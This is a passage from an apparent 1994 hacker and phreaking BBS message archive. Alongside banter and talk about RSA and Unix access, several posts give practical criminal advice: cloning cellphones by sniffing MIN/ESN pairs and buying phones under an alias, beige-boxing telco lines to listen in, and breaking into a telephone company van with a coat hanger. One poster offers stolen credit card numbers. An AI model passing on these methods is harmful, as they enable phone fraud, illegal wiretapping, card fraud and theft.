friends and i'm sure you could write a dedicated decrypter to run really, really fast. -peter From cosmos@yabbs Mon Apr 18 11:24:06 1994 From: cosmos@yabbs To: Schief@yabbs Subject: re: rexd hole? Date: Mon Apr 18 11:24:06 1994 Trying to catch up eh?? Cosmos From feotus@yabbs Tue Apr 19 21:02:00 1994 From: feotus@yabbs To: mephisto@yabbs Subject: re: cellphones Date: Tue Apr 19 21:02:00 1994 yes I know you have to pay the activation etc.. that is why I included the part about buying them under an alias. So you pay cash, like 69 dollars for the radio shack model of this deal(ACK) and then walk away to never be seen again. they ty to trace down your alias with no luck. You now have a cellphone, BUT either od it in a town far away, OR know how to repburn the ESN and otehr assorted info you'll need. From dialtone@yabbs Wed Apr 20 18:21:41 1994 From: dialtone@yabbs To: all@yabbs Subject: re: cellphones Date: Wed Apr 20 18:21:41 1994 Why are we even talking about this?????? -------------------------------------- several years ago this stuff has been exploited, used, abused etc.. People (drug dealers) would run one phone with a multible esn switch so all they had to do was just switch over to the next esn when to abused just by hitting a switch this would also throw off the cell in tracking. I`m sorry but this is old reading but yet it still is news for some reason? just go over to the local radio shack and get thier book on cell phone tech. and be done with it. From feotus@yabbs Fri Apr 22 19:57:31 1994 From: feotus@yabbs To: dialtone@yabbs Subject: re: cellphones Date: Fri Apr 22 19:57:31 1994 well aparently you didnt do it ever 8) you also need to make sure that youhave a valid MIN/ESN combo. So you don't just switch the ESN. You have to vampiore other ESSN/MIN combos that are valid and switch among them. also the Rad Shack books are not as close to as informative as the manufacturers technical manual. if you just switch ESN then youwont get thru, since when you transmit to the cell-0base you transmit the MIN and the ESN which are compared as a pair to the ones on record and must be valid together. Now the thing is you can pick up other phones MIN/ESN combos as they tranmit to tower if you have a scanner, or suitably modified cellphone. From dialtone@yabbs Sat Apr 23 04:09:10 1994 From: dialtone@yabbs To: feotus@yabbs Subject: re: cellphones Date: Sat Apr 23 04:09:10 1994 Look I know about the min/esn combo and about scanning!!!!! I was refering to the time's of ole when cellular was under the IMTS/AFSK system .... (i.e you didnt need the esn/min combo that was registered with the person or manufacturer whom you got it from!) As for the book from radio shack well I was also refering to thier one on basic switching (it covers cellular and principles) Thanks for the reply thou (its nice to still see someone reads out thier) 8) From charta@yabbs Sat Apr 23 08:19:37 1994 From: charta@yabbs To: all@yabbs Subject: Gopher to Unix Date: Sat Apr 23 08:19:37 1994 I've a little problem. I have access to a Gopher but no access to a Unix system, so I can't use FTP or telnet. Are there any way to get a free, legal account on Internet, which I can access via the Gopher..? From Jeremiah@yabbs Sat Apr 23 14:27:38 1994 From: Jeremiah@yabbs To: dialtone@yabbs Subject: I do believe. Date: Sat Apr 23 14:27:38 1994 I have the text on my friends computer.... I'll try to dig it up for ya... From cosmos@yabbs Sat Apr 23 14:39:59 1994 From: cosmos@yabbs To: charta@yabbs Subject: re: Gopher to Unix Date: Sat Apr 23 14:39:59 1994 Fuck gopher. Look for a public access site close to your city or try one of them freenet thingies...hell, anythings better than gopher. Cosmos From Zbadba@yabbs Sat Apr 23 19:24:20 1994 From: Zbadba@yabbs To: charta@yabbs Subject: re: Gopher to Unix Date: Sat Apr 23 19:24:20 1994 Most systems have patched this, but.... Try doing a veronica search for the string "telnet and session and host" it should give you what is apparently a search query. then enter the hostname in that box, and there you go. telnet. Most places have fixed that by now, tho. From Fastjack@yabbs Sun Apr 24 01:20:04 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: Gopher to Unix Date: Sun Apr 24 01:20:04 1994 In message re: Gopher to Unix, cosmos said: > Look for a public access site close to your city or try one of them > freenet thingies...hell, anythings better than gopher. Are you kidding? I mean, yeah, it's free, but have you tried any recently? I know from my dealings on this board previously that I have access on a lotbetter system than most, and I guess I'm spoiled with access. But the only thing you can really do on a freenet is mail, gopher, that sort of thing. You should look for a site where you can get Unix shell access, access to a compiler, that sort of thing. Look for $15-$20/month, flat fee. I haven't seen a freenet that lets you do a goddamn thing. But you get what you pay for...:) :FJ From dialtone@yabbs Sun Apr 24 12:23:40 1994 From: dialtone@yabbs To: Jeremiah@yabbs Subject: re: I do believe. Date: Sun Apr 24 12:23:40 1994 Thanks..... From GPF@yabbs Sun Apr 24 20:05:58 1994 From: GPF@yabbs To: Fastjack@yabbs Subject: re: Gopher to Unix Date: Sun Apr 24 20:05:58 1994 actually..... try instant shell access.. no validation c compiler too :) From Phain@yabbs Tue Apr 26 23:10:49 1994 From: Phain@yabbs To: all@yabbs Subject: credit verification Date: Tue Apr 26 23:10:49 1994 Greets all, The other day, I slotted my credit card at the local BP station. While I was waiting, I heard the distinct dialup sound of a modem and the telltale fuzz of information running across the line. There was no one in line behind me, and the guy didn't seem in a rush, so I asked him if there was a phone line running into his card verification device. He let me get a good look at it. Later that evening I returned with a tape recorder and talked the guy into letting me get a recording of the tones. I have not yet tried to use my recording, but was curious if anyone out there had fooled with this sort of thing before. The H/P croud around here had never heard of anyone experimenting with this before. Lata, Phain. From Zakfeign@yabbs Wed Apr 27 09:33:51 1994 From: Zakfeign@yabbs To: charta@yabbs Subject: re: Gopher to Unix Date: Wed Apr 27 09:33:51 1994 try getting an accnt. at a university... it would help to be enrollled! From Skywise@yabbs Wed Apr 27 10:19:44 1994 From: Skywise@yabbs To: Phain@yabbs Subject: re: credit verification Date: Wed Apr 27 10:19:44 1994 You are Beavis!!!!!!! (profound isn't it?) From Quetzal@yabbs Wed Apr 27 18:35:09 1994 From: Quetzal@yabbs To: Phain@yabbs Subject: re: credit verification Date: Wed Apr 27 18:35:09 1994 I to have wondered about credit verification or veriphones system... if you look at the back of the machine you'll notice a 9pin din plug connecter... if you have the right configuration on yor computer you may be able to hook you computer directly in the a backing system!? --------------------------------------banking----^ but that's only a theory Quetzal From charta@yabbs Thu Apr 28 07:50:03 1994 From: charta@yabbs To: cosmos@yabbs Subject: re: Gopher to Unix Date: Thu Apr 28 07:50:03 1994 I live in Sweden and we have no public access sites, fuck! I've been on the net illegal, but I don't dare it anymore, to many people getting busted. I don't know if my use of the Gopherserver is illegal, but I hope it isn't. From Roosevel@yabbs Fri Apr 29 22:19:42 1994 From: Roosevel@yabbs To: Phain@yabbs Subject: re: credit verification Date: Fri Apr 29 22:19:42 1994 Are you serious? That machine is just a 300 baud modem/computer which connects to the local TYMENET or special store connection and confirms a password, transfers you credit card information and processes a approval number or decline. Its similar to the credit card hacker programs of the late 80s. You log onto TYMENET and your computer goes through a algorithm of credit card sequences and you get a authorization if it works. My question to you : What the hell do you plan to do with working credit card numbers except log on the pay services (ie. America On-Line,etc). If you just want credit card numbers send me bitnet messages and I'll give you some. From Phain@yabbs Sat Apr 30 16:22:15 1994 From: Phain@yabbs To: Roosevel@yabbs Subject: re: credit verification Date: Sat Apr 30 16:22:15 1994 I wasn't really planning anything. Just curious, that's all. BTW, to all the Phreaks out there, Is beige-boxing still possible? This may sound like an elementary question, but I don't generaly find myself in the realm of the Phreak. I tried to put one together the other day in accordance to some old philes, but have had no sucess in it's usage. Thanx, Phain. From Fastjack@yabbs Sat Apr 30 18:00:09 1994 From: Fastjack@yabbs To: Phain@yabbs Subject: Beige Boxing Date: Sat Apr 30 18:00:09 1994 In message re: credit verification, Phain said: > BTW, to all the Phreaks out there, Is beige-boxing still > possible? This may sound like an elementary question, but I It's just like a telephone lineman's box. Get a telephone with integral keypad, then cut the wires and attach alligator clips, pref. the insulated types. > philes, but have had no sucess in it's usage. Find a can or a telephone box in a an apartment building. A lot more useful than most other pieces of equipment, IMHO. :FJ From Dprogram@yabbs Sat Apr 30 23:08:26 1994 From: Dprogram@yabbs To: Fastjack@yabbs Subject: re: Beige Boxing Date: Sat Apr 30 23:08:26 1994 A beige box is really just a telephone, any phone will do. Cut the phone wire and put alligator clips on the red and green wires. To "beige box" is to simply plug in somewhere. Look around for those little grey cabinets. Generally a 7/16 inch nut driver will open them like a charm, they are usually not locked. The main problem with beige boxing is it is kinda obvious-looking. From Ratail@yabbs Sun May 1 04:55:37 1994 From: Ratail@yabbs To: all@yabbs Subject: Wardialers Date: Sun May 1 04:55:37 1994 Wardialers........grin I've got voice and data finders what I want is a fax finder. Anybody know of where to get one or have one? Point me/Up it and I'll grab it. You'd think with all the fax modem's out there someone would have been thoughtful enough to post it publicly (via ftp). O-well so much for the Public From rattler@yabbs Sun May 1 12:37:06 1994 From: rattler@yabbs To: feotus@yabbs Subject: re: rsa Date: Sun May 1 12:37:06 1994 we... when they factored rsa129 they didn't have a super connection machine to do it with. i fugure 500 megabytes of ram and 64000 cpus oughta speed things up a bit. From rattler@yabbs Sun May 1 12:39:29 1994 From: rattler@yabbs To: ButtrBoy@yabbs Subject: re: rexd hole? Date: Sun May 1 12:39:29 1994 rexd is like rsh , but it works with Suns (insecure) rpc. ie. you can run proggies from where-ever as bin. From Jeremiah@yabbs Sun May 1 15:08:32 1994 From: Jeremiah@yabbs To: Phain@yabbs Subject: Beigh boxing Date: Sun May 1 15:08:32 1994 I still go out now and then... I pretty much do it for spying when I have absolutely nothing to do... You'd be surprised what people talk about when they think that no one is listening. From cosmos@yabbs Sun May 1 15:15:52 1994 From: cosmos@yabbs To: Phain@yabbs Subject: re: credit verification Date: Sun May 1 15:15:52 1994 Bwahahahah Keep it up...I love a good laugh. Gonna set up a few 3l33t |<-RaD cons?? Hehehh Cosmos From cosmos@yabbs Sun May 1 15:17:13 1994 From: cosmos@yabbs To: Ratail@yabbs Subject: re: Wardialers Date: Sun May 1 15:17:13 1994 So much for intelligent, resourceful users. *sigh* Cosmos From Kashmir@yabbs Sun May 1 15:53:45 1994 From: Kashmir@yabbs To: Phain@yabbs Subject: re: credit verification Date: Sun May 1 15:53:45 1994 Beige boxing will almost always be possible..A beige box is a tool of a linem so.. (The handset) From Natalie@yabbs Sun May 1 22:50:03 1994 From: Natalie@yabbs To: Jeremiah@yabbs Subject: re: Beigh boxing Date: Sun May 1 22:50:03 1994 AIEEEEE!!! You were listening to my phone conversations? *blush* I may have to kill you now *giggle* From sevmek@yabbs Mon May 2 14:43:08 1994 From: sevmek@yabbs To: rattler@yabbs Subject: re: rsa Date: Mon May 2 14:43:08 1994 In message re: rsa, rattler said: > we... when they factored rsa129 they didn't have a super connection > machine > to do it with. > > i fugure 500 megabytes of ram and 64000 cpus oughta speed things up > a bit. > Yes, it might speed things up a bit. But not nearly as much as you may think. The bottleneck becomes dealing with all the processors and what each should be doing. Also, rsa129 was ONE two-prime composite. It happened to be the one Scientific American chose to base their contest on. In just the 129 digit realm there are MANY others... let's say that one out of every trillion numbers is a suitable prime. That leaves 10^117 choices for a 129 digit key. Each of which would take all those little computers ANOTHER 8 months, or the NSA perhaps several days. I think the 'weak link' in RSA is how you handle the passwords in real life, remember what they are, and where and how you handle the decoded information. The number of processors you throw at a problem doesn't change the problem's order of magnitude. --Sevmek From feotus@yabbs Wed May 4 10:03:05 1994 From: feotus@yabbs To: rattler@yabbs Subject: re: rsa Date: Wed May 4 10:03:05 1994 First off, they didnt do it on one machine, they just spread it out to a bunch of different volounteer machines, which added up alot of proccessing time. Also it was a RSA129 key, now take however many bits are in that, and subtract aht from 1024 and then take 2 to that power and that's how much more difficult it is to break the 1024bit key than the RSA129. for example, if you have a 400bit key, and you crack it, then you want to try and crack the 1024bit key, you would have to expend 2^624 times more power to do it. NOw that is a very large number, considering the number of estimated moleculs in the universe is less than that. So I say even with the NSAs computing power, which theyget to measure in ACRES 8), it would take a long time to crack a 1024 bit key. Tho one of the smaller PGP keys are suggested to be crackable in one year or so if the NSA dedicated all of their processing time to it. The thing is now, that it is so daunting to do that, they eitehr knock you off real quiet like, or they get your passwd to your se3cret key. If it's going to take them that long tim decrypt it, I'm sure they will justget you out of the loop some other way. From Fastjack@yabbs Thu May 5 19:08:21 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: Wardialers Date: Thu May 5 19:08:21 1994 In message re: Wardialers, cosmos said: > So much for intelligent, resourceful users. And this is the 'Net. Imagine the local "scene". And I use the term loosely.... :FJ From cosmos@yabbs Thu May 5 19:46:16 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: Wardialers Date: Thu May 5 19:46:16 1994 Yeah, I know ;) I recently got dragged to the last "2600" meeting. Okay, I admit I am a 2600 lamer...I mean, Ive gone to one other meet in the past year. Anyways, I never spent a more enjoyable afternoon/evening. IT was like comedy night at the local bars. See how many redbox questions and tones we can make, ohh...look at the motorola cellular phone..., what this??? A password file being passed, into the big stuff now. Call me crazy, but the last coroporate security meeting I attended was better...maybe becuase they actually know what they are talking about?? (well, not all of them...but people like Farmer do. ;) ) Cosmos From feotus@yabbs Fri May 6 17:40:35 1994 From: feotus@yabbs To: cosmos@yabbs Subject: re: Wardialers Date: Fri May 6 17:40:35 1994 what's even worse than the 2600 meetings, are the pothetic litle twats around these small towns that think they can hack. I had one kid tell me he broke into the local airbases computer system and messed with all kinds of records. I asked him id he used a divertor, and he didnt even know what it was. I asked him what OS they were running and he said it was a souped up version of DOS 8) Another one was going around the bookstore with his littel Star Trek fuckweed freinds and starts saying out loud so that me and my freind here him, "DOS sucks, yeah it just is too weak." and "QBASIC is really a powerful language once you learn it" and "Hey Bill, look a QBASIC Games book, man I know QBASIC already dood." So when he sees me and my freind fingering thru some Unix books he asks us how good of a langiuage Unix is. And he tells us that he hangs out on the internet all the time, even tho he doesnt know what Unix is 8) Then he asked me what OS I ran at home, when I told him linux he asked me if that was a weird version of Windows or something. my freind, the not-so-polite-one tells him to fuck off and go sticka joystick up his ass. bill the ST junkie gets pissed and walks away, All is well and we have a big bucket of french fries. From feotus@yabbs Fri May 6 17:43:01 1994 From: feotus@yabbs To: all@yabbs Subject: out of band signalling Date: Fri May 6 17:43:01 1994 Do any of the real phreakers out here have any info on what frequency the phone co will be using for out of band signalling. It seems that some local payphones have switched to it. They have to install new hardware on the payphone since it is a band that is out of the normal ~~4kHz channel that phonelines use. It wont be going thru the reciever so I assume you'll need to patch into the line director before it gets to the phone. From JasonLee@yabbs Fri May 6 19:16:24 1994 From: JasonLee@yabbs To: feotus@yabbs Subject: re: Wardialers Date: Fri May 6 19:16:24 1994 In message re: Wardialers, feotus said: > Another one was going around the bookstore with his littel Star Trek > fuckweed freinds and starts saying out loud so that me and my freind here Hey! Star Trek isn't that bad... :) JasonLee From Natalie@yabbs Fri May 6 20:55:47 1994 From: Natalie@yabbs To: feotus@yabbs Subject: re: Wardialers Date: Fri May 6 20:55:47 1994 what's wrong with star trek? My st keychain is a nice little 2 nice sharp poins on it.... natalie From htoaster@yabbs Sat May 7 00:06:20 1994 From: htoaster@yabbs To: feotus@yabbs Subject: re: out of band signalling Date: Sat May 7 00:06:20 1994 In message out of band signalling, feotus said: > It wont be going thru the reciever so I assume you'll need to patch into > the line director before it gets to the phone. sorry, can't help you with the freqs. however this is true, you'll have to patch into the line directly. on most bell atlantic phones (or related baby bells around the country) they tend to keep their payphones pretty secure, making cable access a little tough. usually the cocots are a little easier to hit (there is one here that just has the phone wire running out the back and up the wall into the building its on, how insecure)... while i wouldn't reccomend vandalism (saving .25 by destroying stuff that others may use doesn't seem worth it somehow) cocots are definatly easier to hit... if you find out anything about the OOB signalling that they use an informative post would be cool though...i'm just interested to see what sorts of stuff they send out there... alex From Kamakize@yabbs Sat May 7 01:17:21 1994 From: Kamakize@yabbs To: TheDev@yabbs Subject: re: red ... Date: Sat May 7 01:17:21 1994 right ive had 100% success with operors with my box... ive done one internaionaly with good sucess with an 5.336 x-tal From Kamakize@yabbs Sat May 7 01:25:47 1994 From: Kamakize@yabbs To: feotus@yabbs Subject: re: sum Date: Sat May 7 01:25:47 1994 well i say imthe ONLY rue hacker from Delphi witth a legit account on Delphi.... laterz From feotus@yabbs Sat May 7 11:39:19 1994 From: feotus@yabbs To: Kamakize@yabbs Subject: re: sum Date: Sat May 7 11:39:19 1994 "only real hacker on Delphi with legit account" your point is 8) why get a legit account from Delphi? If your going to get a legit one at least go thrua better service than that. From feotus@yabbs Sat May 7 11:52:33 1994 From: feotus@yabbs To: all@yabbs Subject: Out Of Band signalling 101 Date: Sat May 7 11:52:33 1994 after digging thru my rusty trusty telecommunications bible.. ht: well why would I worry about a COCOT with OOB, since all the charging etc.. takes place inside it and it's just another POTS line to it? But I can see where you mean acces to wires is easier, almost laways something exposed. On fortress phones it's difficult, unless you have a concrete cutter or something in your pocket. first inline band signalling - it is basically control signals from office to office INSIDE the voice bandwidth ~~ 300-3100Hz. These are like the 2600Hz signal for the now dead blueboxes, and the 2500Hz for RedBox tones. out of band- is when the line carries the normal voice bandwidth, and also a narrow signaling band, usually only at a single frequency. For insance the CCITT Signaling System no. R2 (CCITT is sorta like international standards) uses a signalling band of 3825Hz (+-4Hz) of rit's OUT of band signalling. most of you probably know that stuff already. in order to use out of band signalling tho, the telco has to install more electronics on both ends. Now at the local office, that's no problem, but that means they need to add it to the payphone if their going to use it between them and the office. So older ones are no problem usually, it's the newer ones they are installng, tho I have found that not all of them use it. the out of band control signlas are sent thru the voice channel, so ou can no longer put a tone generator to the receiver and have it go thru. You need to patch either into the electronics of he signaller itself, or into the wires. This is difficult on payhhones to say the least. I havent figured out waht frequency the telco's are using now for ot of badn signalling, as the telco around here isnt using it yet, so the I know who work there don't know yet. From cosmos@yabbs Sat May 7 14:41:04 1994 From: cosmos@yabbs To: feotus@yabbs Subject: re: Wardialers Date: Sat May 7 14:41:04 1994 heh, us big city folk have the same dweebs. Just more of them. Cosmos From cosmos@yabbs Sat May 7 14:43:08 1994 From: cosmos@yabbs To: Kamakize@yabbs Subject: re: red ... Date: Sat May 7 14:43:08 1994 Give it up already with those silly little redboxes. I just want to take them and shove them up all those 2600 shitheads asses. ;) Cosmos From cosmos@yabbs Sat May 7 14:43:45 1994 From: cosmos@yabbs To: Kamakize@yabbs Subject: re: sum Date: Sat May 7 14:43:45 1994 And your still a fuckwad. Cosmos From Fastjack@yabbs Sat May 7 21:44:38 1994 From: Fastjack@yabbs To: Kamakize@yabbs Subject: re: sum Date: Sat May 7 21:44:38 1994 In message re: sum, Kamakize said: > well i say imthe ONLY rue hacker from Delphi > witth a legit account on Delphi.... > > laterz You have access through a service like _that_? God, I hope it's not true what my unfortunate aquaintances say about their rates, disk quota, and system.... On a similar note, they sure do hype that little 'Five free hours on the _INTERNET_' campaign, hmm? I'm sure millions of r3al Hackerz are waiting for an MS-Windoze interface, eh? hmm, l8trz. Fastjack From Fastjack@yabbs Sat May 7 21:47:07 1994 From: Fastjack@yabbs To: htoaster@yabbs Subject: re: out of band signalling Date: Sat May 7 21:47:07 1994 In message re: out of band signalling, htoaster said: > patch into the line directly. on most bell atlantic phones (or related baby > bells around the country) they tend to keep their payphones pretty secure, > making cable access a little tough. usually the cocots are a little easier > to hit (there is one here that just has the phone wire running out the back > and up the wall into the building its on, how insecure)... while i wouldn't > reccomend vandalism (saving .25 by destroying stuff that others may use doesn't > seem worth it somehow) cocots are definatly easier to hit... > In my experience, the cocots have shitty physical security on the lines. COCOTs in old buildings and dorms are especially vulnerable.... :FJ From tknight@yabbs Sun May 8 11:47:52 1994 From: tknight@yabbs To: all@yabbs Subject: couple of things... Date: Sun May 8 11:47:52 1994 First off, I need advice about getting into those wonderful telco vans. They have a tendency to lock them around here, but i've been spotting one particular van at my local CO out lately. It appears to be broken, but all the stuff is still in it. I already have my very own Linesman handset, so what i really want to do is get those manuals in that file cabinet thing in the front seat. This particular van is the old style with those little triangle windows on the front that tilt in. I cant pick locks and I cant just shatter the glass because the CO is right next to an old folks home. How effective is Duct tape to muffle the sound? Please post any efficient ways to get into these vans. Second, Does anyone know anything abouit this upcoming switch from Cosmos to Switch? I've been reading some internal memos about it that i have gotten trashing but they mostly just told me about the conversion process. Third, will it be possible to clip a phone onto fiber lines(I know i cant use my handsset, fiber doesnt conduct), and if so, how? Last, some time this week i will be spending a day down at Southern Bell hanging out with the System Administrators on their private PSN, right now i'm just waiting for security clearance. Tobias Knight From buzzbomb@yabbs Sun May 8 12:47:24 1994 From: buzzbomb@yabbs To: cosmos@yabbs Subject: big city folk Date: Sun May 8 12:47:24 1994 where are you from, Cosmos? From cosmos@yabbs Sun May 8 13:24:22 1994 From: cosmos@yabbs To: buzzbomb@yabbs Subject: re: big city folk Date: Sun May 8 13:24:22 1994 Bright Lights, Big City. And you? Cosmos From Zbadba@yabbs Sun May 8 13:44:22 1994 From: Zbadba@yabbs To: tknight@yabbs Subject: re: couple of things... Date: Sun May 8 13:44:22 1994 ok, on the van: forget breaking the glass, etc. get yourself a handy-dandy coat hanger, straighten out the wire, and make one end into a small hook. insert it into the stripping on the window above the lock mechanism, and basically yank it around. (It's too hard to tell you exactly how, and it shouldn't take you more than 2 minutes just by stumbling around). you can tap fiber lines, yes ()with a fiber tap, duh). as to using a handset w/ it, probably not, mainly because fiber lines are almost never used as end lines; generally they are used only as trunks. From feotus@yabbs Mon May 9 08:59:33 1994 From: feotus@yabbs To: Zbadba@yabbs Subject: re: couple of things... Date: Mon May 9 08:59:33 1994 Well also fiber carries digital signals too, and also since there trunks you have all the neat translating too do. Basically if you have the equipment you can do it, but that's true for anything. The thing is too wait for them to do the whole fiber to the homes thing, which I think is not going to happen anytime really soon, too much money to do it all. But IF it happens then the fun sarts with masive banwidth to the home. long ways away at best tho. From Zbadba@yabbs Mon May 9 21:35:45 1994 From: Zbadba@yabbs To: feotus@yabbs Subject: re: couple of things... Date: Mon May 9 21:35:45 1994 I don't long for the days of fiber in the home. For a few reasons: First, the flood of true illiterates onto the nets. (let's face it, if you can get online here, you're not totally illiterate) Second, the nets become commercialized and for profit (i.e. the free ride is already over for those not in academic institutions, and soon I fear that refuge will be lost as usage fees/pay as you go tolls are instituted). If I start having to pay for connect time at UWF, well, fuck it. I'll go back to landline BBS's which are free local calls. sure there's not nearly the diversity or breadth of services, but it's free. Finally, I will miss the net and all it's intricacies. No, there's no real-time video or such (well, for most of us). But I don't want some kind of lubricated pipeline for that sort of stuff. the present day internet is much like a river system... with oxbow lakes, large tributaries and tiny creeks, backwaters, headwaters, rapids, damns and locks, eddies, and whirlpools. It's a place you can get lost in if you don't know where you are going. it's not all friendly and technicolor, but then neither is "real life." No, I do not look forward to fiber optics as I see it now. I don'twant the internet to become prodigy. From elwood@yabbs Mon May 9 22:59:12 1994 From: elwood@yabbs To: Zbadba@yabbs Subject: re: couple of things... Date: Mon May 9 22:59:12 1994 amen, brother! From GPF@yabbs Mon May 9 23:22:14 1994 From: GPF@yabbs To: Zbadba@yabbs Subject: re: couple of things... Date: Mon May 9 23:22:14 1994 i really don't think that the internet ever COULD become prodigy.... there will always be a level of it that is geared for hackers..... and besides... a flood of lamers means a lack of good sysadmins and easy pickings ;) ++gpf From Natalie@yabbs Mon May 9 23:57:54 1994 From: Natalie@yabbs To: Zbadba@yabbs Subject: re: couple of things... Date: Mon May 9 23:57:54 1994 Well, I know that where I go to school (Western Michigan) there's a $100 limit/month on VAX. WE don't pay, but we only get $100 worth of time. And they don't bother telling anyone about unlimited UNIX. And I'm afraid they're going to put a limit on UNIX in the next few years, even tho not as many people use it. And a friend of mine at U-Mich only get $25 worth of UNIX/month. So it's already started... natalie From ButtrBoy@yabbs Tue May 10 19:36:32 1994 From: ButtrBoy@yabbs To: Natalie@yabbs Subject: re: couple of things... Date: Tue May 10 19:36:32 1994 Actually, Natalie, I go to umich and the only timesharing shit/accounting is done for MT$, the academic mainframe. They charge you for the MT$ cpu time, but most people who use the UNIX servers don't go thru the mainframe, unless they don't know any better. They aren't charging anything for UNIX, not even diskspace (i got 30 megs, heh). but that's a little different... there's always x25... From Roosevel@yabbs Tue May 10 19:57:46 1994 From: Roosevel@yabbs To: Kamakize@yabbs Subject: Delphi Date: Tue May 10 19:57:46 1994 If you were a real hacker you wouldn't have a legit account on any system especially network. From feotus@yabbs Tue May 10 20:08:12 1994 From: feotus@yabbs To: Roosevel@yabbs Subject: re: Delphi Date: Tue May 10 20:08:12 1994 "if you were a real hacker yo wouldnt have a legit account on any system" --------quote from Roosevel---^^^^^^^^^^^^^ that is a load of shit if I ever heard one. What about hackers that run their own systems? It's legit? What about college students givena account? Should they throw it away? Come on man. From cosmos@yabbs Tue May 10 20:11:19 1994 From: cosmos@yabbs To: Roosevel@yabbs Subject: re: Delphi Date: Tue May 10 20:11:19 1994 Fuck you punk. Who the hell do you think you are??? "If youre a real hacker..." Yeah, you can come bite my crank. I consider myself a "real" hacker and I have several legit accounts...granted not DELPHI. One more time...piss off lamer. Cosmos From Natalie@yabbs Tue May 10 22:19:25 1994 From: Natalie@yabbs To: ButtrBoy@yabbs Subject: re: couple of things... Date: Tue May 10 22:19:25 1994 eh...all I know is what my friend told time i talk to him I'll ask what he meant... From elwood@yabbs Wed May 11 18:08:26 1994 From: elwood@yabbs To: all@yabbs Subject: accounts Date: Wed May 11 18:08:26 1994 Hey all! I was wondering if someone could get me an account somewhere (hacked or otherwise) (in Maryland or otherwise). I am poor and I need access to the system over the summer. I am not a hacker (yet), so I do not know where to start. Please help me. Please give me info through email here or at my email address at college. Thanks a bunch. elwood From cosmos@yabbs Wed May 11 19:21:40 1994 From: cosmos@yabbs To: elwood@yabbs Subject: re: accounts Date: Wed May 11 19:21:40 1994 BWAHAHAAHAHAHAHA....fuck off lamer. "I am not a hacker(yet)"...and never will be. Cosmos From elwood@yabbs Wed May 11 20:17:27 1994 From: elwood@yabbs To: cosmos@yabbs Subject: re: accounts Date: Wed May 11 20:17:27 1994 *kiss* love you too, dude. Hey, here's a wrench. Go fix your attitude. Here's a screwdriver. Go... (you figure it out) loves and kisses elwood From Choke@yabbs Fri May 20 19:23:34 1994 From: Choke@yabbs To: Roosevel@yabbs Subject: re: Delphi Date: Fri May 20 19:23:34 1994 really? but how do they know that one is a hacker or not? curious. curious. From ButtrBoy@yabbs Fri May 20 22:57:13 1994 From: ButtrBoy@yabbs To: elwood@yabbs Subject: home acct. in MD Date: Fri May 20 22:57:13 1994 d00d, ain't no1 gonna give you an acct. just 4 the asking. there are a lot of public unix systems in the area, pretty cheap i think. since you got an account now, try to look for info on access providers, i think I saw a pretty decent list on some www server. just look around, really. and quit with the standard flamewar responses. sheesh. good luck. -=ButterBoy=- From Carsenio@yabbs Sun May 22 15:49:37 1994 From: Carsenio@yabbs To: Roosevel@yabbs Subject: re: Delphi Date: Sun May 22 15:49:37 1994 While I do agree that having a legit acct on delphi of all places is cheesy, i think you saying that real hackers don't have legit accounts is complete and utter bullshit. Most of the best hackers have at least one legit acct for e-mail/net purposes. Many, like me own there own unix machines. It is in fact very unwise to abuse and leech from a system like it's a 0-day warez board, using it to telnet to all your kewl bbs's and go on irc. Using hacked accounts in that manner constantly is lame. And if you're only purpose to hack is to maintain you're access to irc and net bbs's, you should rethink your motives. Granted you can't play with unix to its full extent when you have some normal leve; acct on a college or commercial system.. but that's why people run unix at home like me. Anyway.. what you expressed is what i consider to be a very kiddie-ish attitude and not very well supported or thought through.. -carsenio From buzzbomb@yabbs Sun May 22 19:38:51 1994 From: buzzbomb@yabbs To: cosmos@yabbs Subject: re: big city folk Date: Sun May 22 19:38:51 1994 dim lights, small suburb. well not that small. just outta DC. From buzzbomb@yabbs Sun May 22 19:42:52 1994 From: buzzbomb@yabbs To: elwood@yabbs Subject: re: accounts Date: Sun May 22 19:42:52 1994 howdy - i'm in maryland, college park... is that where you're from? how do you get here if you don't have an account? or do you mean a second account to play with over the summer? From scudder@yabbs Mon May 23 20:07:36 1994 From: scudder@yabbs To: all@yabbs Subject: LoCaLiTy... Date: Mon May 23 20:07:36 1994 So....wher do you people dwell in reality? I am from Grove City, OH. It's a suburb of Columbus, and here in Central Ohio our H/P scene is just starting to build itself up...our main claim to fame sofar is the 2600 meetings attended by a whole 5 people......right now we're trying to start a group and put out a 'zine...if anyone wants to submit a 'trib then post here with you E-mail address and I'll get some submissions guidelines out to you...AS SOON AS WE MAKE 'EM UP!!!! K-ya... -=Scudder=- 1st annual member and Bob Dylan Wannabe of CiA Private... From cosmos@yabbs Tue May 24 02:04:09 1994 From: cosmos@yabbs To: scudder@yabbs Subject: re: LoCaLiTy... Date: Tue May 24 02:04:09 1994 In message LoCaLiTy..., scudder said: > So....wher do you people dwell in reality? I am from Grove City, OH. It's > a suburb of Columbus, and here in Central Ohio our H/P scene is just > starting to build itself up...our main claim to fame sofar is the 2600 > meetings attended by a whole 5 people......right now we're trying to > start a group and put out a 'zine...if anyone wants to submit a 'trib then > post here with you E-mail address and I'll get some submissions guidelines > out to you...AS SOON AS WE MAKE 'EM UP!!!! K-ya... HAHAHAHAHA. Yes, I couldnt resist tearing this dumb fuck a new asshole. This is what things have come to. Ohio kiddies impressed by a 2600 meeting which usually consists of wankers playing red box tones and the occasional cell phone...oh joyous day. This is the gene pool of tomorrows technical professionals??? God damn I am glad I was a kid in the eighties...they had a clue up until 88. Have fun kids. Cosmos From Natalie@yabbs Tue May 24 02:28:57 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: LoCaLiTy... Date: Tue May 24 02:28:57 1994 hmmm...1988 was the year I stopped teaching myself how to program...could there be a correlation here? *insane giggling* natalie From scudder@yabbs Tue May 24 18:31:03 1994 From: scudder@yabbs To: all@yabbs Subject: re: LoCaLiTy... Date: Tue May 24 18:31:03 1994 Okay people, I came off sounding like WAY too much of a fucking moron in my initial post....we're beginners...we are not imbiciles...I was looking for someone to help us get a stable footing in the realms...hell, my main intentions are to weed out all of the Malicious shitheads, virus idiots, warez and codez D00DZ[sic] and leave the area open for the learners(myself included), programmers, and intellectualls...we are not a bunch of dumb fucks from Cowtown Ohio, the 2600 meeting was meant to unify all of those with similar interests, and as my post was intended to show..has failed miserable... From ButtrBoy@yabbs Tue May 24 19:46:54 1994 From: ButtrBoy@yabbs To: all@yabbs Subject: re: LoCaLiTy... Date: Tue May 24 19:46:54 1994 sheesh. From uufnord@yabbs Wed 